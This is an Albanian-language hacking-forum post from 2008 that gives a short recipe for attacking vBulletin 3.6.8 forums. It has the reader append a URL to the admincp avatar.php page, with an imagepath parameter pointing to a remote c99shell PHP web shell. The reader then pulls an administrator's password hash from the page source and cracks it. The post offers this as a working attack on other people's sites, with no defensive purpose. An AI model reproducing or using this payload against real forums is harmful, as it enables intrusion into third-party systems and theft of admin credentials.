ForumPortaliRegjistrohuidentifikimi

Share | 
 

 Vbulletin 3.6.8 Xxs

Shko poshtė 
AutoriMesazh
noizy
Admin


Numri i postimeve : 197
Join date : 26/07/2008

MesazhTitulli: Vbulletin 3.6.8 Xxs   Sat Aug 09, 2008 4:00 pm

Qe nje xxs per vbulletin 3.6.8

Fillim shikojm ndonje forum 3.6.8 www.emri.com/forum ja shtojm kete mbas:

admincp/avatar.php?imagepath=http://no.spam.ee/~tonu/phpshell/c99shell.txt?

Pastaj nqs se ka te siguruar te qon ne hyrje te admincp shkojm aty me majten View Source , shtypim Ctrl+f kerkojm per

type

aty afer e keni hashin e njerit prej adminave atehere kerkojm ndonje Hash cracker te mire dhe funksionon met mira
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://tutoriale-al.4umer.com
 
Vbulletin 3.6.8 Xxs
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacking/Cracking/WareZ/Download :: Hacking-
Kėrce tek: